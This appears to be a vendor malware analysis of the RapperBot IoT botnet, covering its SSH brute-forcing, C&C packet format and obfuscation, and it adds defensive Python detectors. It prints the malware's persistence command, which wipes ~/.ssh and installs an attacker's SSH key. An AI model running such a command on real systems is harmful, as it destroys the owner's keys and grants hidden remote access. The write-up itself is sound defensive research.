RapperBot: A new threat for IoT devices

Summary

  • Discovered in June 2022
  • Has borrowed code from Mirai Bot
  • Targets Linux devices with ARM, MIPS, SPARC and x86 architectures
  • Uses own SSH authorized key to connect to the device
  • Has own identifier on targeted servers
  • Has a hardcoded bot ID for registration

On June 22, 2022, CNCERT IoT Threat Research Team and NSFOCUS FuYingLab monitored a new botnet that was attacking IoT devices. Naming the threat ‘RapperBot,’ researchers found more than 5,000 compromised hosts, but no attack commands were spotted.

In analyzing the samples, analysts found similarities with Mirai Bot, whose source code was leaked. RapperBot has samples for different architectures, such as ARM, MIPS, SPARC and x86, and works as an SSH brute-forcer.

Technical details

Overview

Viewing RapperBot samples in Intezer Analyze, we can see that it has borrowed code from Mirai. Those samples were developed for different architectures, such as ARM, MIPS, SPARC and x86.

Source: Intezer (SHA256:dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae)

Execution

RapperBot's main goal is to brute-force SSH servers that use password authentication. This is the main difference from Mirai Bot, which brute-forced Telnet servers. RapperBot can connect to and brute-force any SSH server that uses Diffie-Hellman Group 1 (768 bytes) or Group 14 (2048 bytes) for key exchange and AES128-CTR for data encryption.


In the first samples, the passwords used for brute-forcing were hardcoded in the binary. The ‘.data’ section contains 57 passwords, all of which are weak and easy to guess.


Later samples don't have hardcoded passwords — instead, RapperBot obtains them from the C&C server. This allows threat actors to refresh their list without updating the malware.

RapperBot identifies itself to the target SSH server with the version string ‘SSH-2.0-HELLOWORLD.’ One of the stored strings is a command that replaces the victim's ~/.ssh/authorized_keys with the attacker's own SSH public key. This lets the threat actors authenticate to the compromised server without any password.


Full command and SSH key:

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-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 helloworld">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;
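As an added example (not part of the original analysis), the following Python check audits authorized_keys files for the key comment ‘helloworld’ that appears in the command above. The key material itself is elided on this page, so only the comment is used as the indicator; the sample file content and its key blobs are constructed placeholders.

```python
# Added example (not from the original analysis): audit authorized_keys
# files for the persistence indicator described above. Only the key
# comment "helloworld" from the page's command is used as the indicator;
# the key material is not reproduced on the page, so it is not matched.
import os
from typing import Dict, List, Tuple

SUSPICIOUS_COMMENTS = {"helloworld"}
KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key_type, key_blob, comment) per key line; option prefixes such
    as no-pty,command=... are skipped (quoted options with spaces not handled)."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, tok in enumerate(fields):
            if tok in KEY_TYPES and i + 1 < len(fields):
                entries.append((tok, fields[i + 1], " ".join(fields[i + 2:])))
                break
    return entries

def audit_authorized_keys(text: str) -> List[str]:
    """Return one finding per key whose comment matches the indicator."""
    return [f"{ktype} key with comment '{comment}' (matches RapperBot indicator)"
            for ktype, _blob, comment in parse_authorized_keys(text)
            if comment in SUSPICIOUS_COMMENTS]

def audit_home_dirs(root: str = "/home") -> Dict[str, List[str]]:
    """Check <root>/<user>/.ssh/authorized_keys for every user directory."""
    results: Dict[str, List[str]] = {}
    if not os.path.isdir(root):
        return results
    for user in sorted(os.listdir(root)):
        path = os.path.join(root, user, ".ssh", "authorized_keys")
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = audit_authorized_keys(fh.read())
            if hits:
                results[user] = hits
    return results

# Constructed sample file (placeholder key blobs, not real keys).
SAMPLE_FILE = (
    "# admin workstation\n"
    "ssh-ed25519 AAAAC3PLACEHOLDER admin@example\n"
    "ssh-rsa AAAAB3PLACEHOLDER helloworld\n"
)
```

Run audit_home_dirs() on a host to check every user's file; a hit only indicates the comment string, so confirm by comparing the key blob against a known-good inventory.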

The earliest-spotted RapperBot samples contained stored SSH commands that were executed on compromised servers. One of them invokes ‘wget’ to download data from a given IP address. These commands were removed in later samples.

SHA256:3b5d0075255c5df72bed53ec0154a612db416cbeda109df822593ee5424d3b1e

These samples also have a hardcoded string containing an Instagram tag and a YouTube link, which is displayed at the start of execution. The Instagram account is empty, and the YouTube link leads to a rap music clip (hence the name ‘RapperBot’).


IP addresses are not stored in clear text; they are computed during execution by passing hardcoded numbers to a calculation function that produces the address.


The list of cross-references to this function shows that it is called from many places in the code, meaning that these samples can hold the IP addresses of many remote servers.


These samples store a 32-byte value that is placed in every packet sent to the server; those bytes are the bot ID. The packet size is 74 bytes, so the remaining bytes of the packet are filled with “00”.


When preparing a packet to send, RapperBot sets the 33rd byte to one of the following values:

Code   Command
0x00   Register
0x01   Keep alive
0x02   Client terminate
0x03   Perform an attack
0x04   Stop all attacks
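The packet layout just described, as an added example that is not part of the original analysis: a small Python detector that recognises a packet of this shape (32-byte bot ID, command code at byte 33, zero padding to 74 bytes) in captured TCP or UDP payloads and decodes the command. The bot ID value used for the sample packet is a constructed placeholder.

```python
# Added example (not from the original analysis): a detector for the
# RapperBot C&C packet layout described above. The layout, as the page
# states it: 32-byte bot ID, then a one-byte command code at offset 32
# (the "33rd byte"), zero-padded to a total of 74 bytes.
from dataclasses import dataclass
from typing import Optional

PACKET_LEN = 74
BOT_ID_LEN = 32
COMMANDS = {
    0x00: "Register",
    0x01: "Keep alive",
    0x02: "Client terminate",
    0x03: "Perform an attack",
    0x04: "Stop all attacks",
}

@dataclass
class RapperBotPacket:
    bot_id: bytes
    command: int

    @property
    def command_name(self) -> str:
        return COMMANDS[self.command]

def build_packet(bot_id: bytes, command: int) -> bytes:
    """Build a packet in the described layout (used here to construct test data)."""
    if len(bot_id) != BOT_ID_LEN or command not in COMMANDS:
        raise ValueError("bad bot id length or unknown command")
    return bot_id + bytes([command]) + b"\x00" * (PACKET_LEN - BOT_ID_LEN - 1)

def parse_packet(data: bytes) -> Optional[RapperBotPacket]:
    """Return the decoded packet if data has the layout, else None. Shape-only
    match (length, known code, zero padding); the bot ID value is not checked."""
    if len(data) != PACKET_LEN:
        return None
    command = data[BOT_ID_LEN]
    if command not in COMMANDS:
        return None
    if any(data[BOT_ID_LEN + 1:]):          # padding must be all 0x00
        return None
    return RapperBotPacket(bot_id=data[:BOT_ID_LEN], command=command)

# Constructed sample: a registration packet with a made-up bot ID ('A'..'`').
SAMPLE_BOT_ID = bytes(range(0x41, 0x41 + BOT_ID_LEN))
SAMPLE_PACKET = build_packet(SAMPLE_BOT_ID, 0x00)
```

Because the match is purely structural, run it only over payloads to suspected C&C endpoints and treat a hit as a lead to confirm against the 32-byte bot ID, not as proof on its own.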

Then it starts sending messages. This sample has functions to send messages over both TCP and UDP. Unfortunately, these samples could not connect to the servers at the time of this analysis because the servers had already gone offline.


The latest samples (‘bchlhz0a5.dll’), found in July 2022, differ from the earlier ones in several ways. What first catches the eye is the low number of strings: only nine, while the previous sample has 92. This is because the strings are stored separated by one character and concatenated during execution.


The latest samples also use the same packet structure as the previous ones.


Obfuscation

RapperBot uses function-call obfuscation: the address of the callee is loaded into one of the general-purpose registers and the call is made indirectly through that register, which hides the target from a static cross-reference listing.


Later samples also use string obfuscation, storing strings separated by one character and concatenating them before use.


Conclusion

RapperBot borrowed code from Mirai Bot but has its own implementations, such as its C&C protocol. The earliest-discovered samples differ from later ones, including in the presence of some SSH commands and in string obfuscation. It installs its own authorized key to allow connections without any password, and it identifies itself to the targeted server with the ‘SSH-2.0-HELLOWORLD’ string. It stores a bot ID, which is used in bot registration, and has five different commands for communicating with the server.

While targeting IoT devices, it may also pose a threat to Linux-based machines, for which Acronis Cyber Protect also has anti-malware functionality.

Detected by Acronis

Acronis Cyber Protect detects RapperBot samples on various architectures.

Screenshots: detections of the ARM, Intel 80386 and MIPS samples.

IoCs

Files
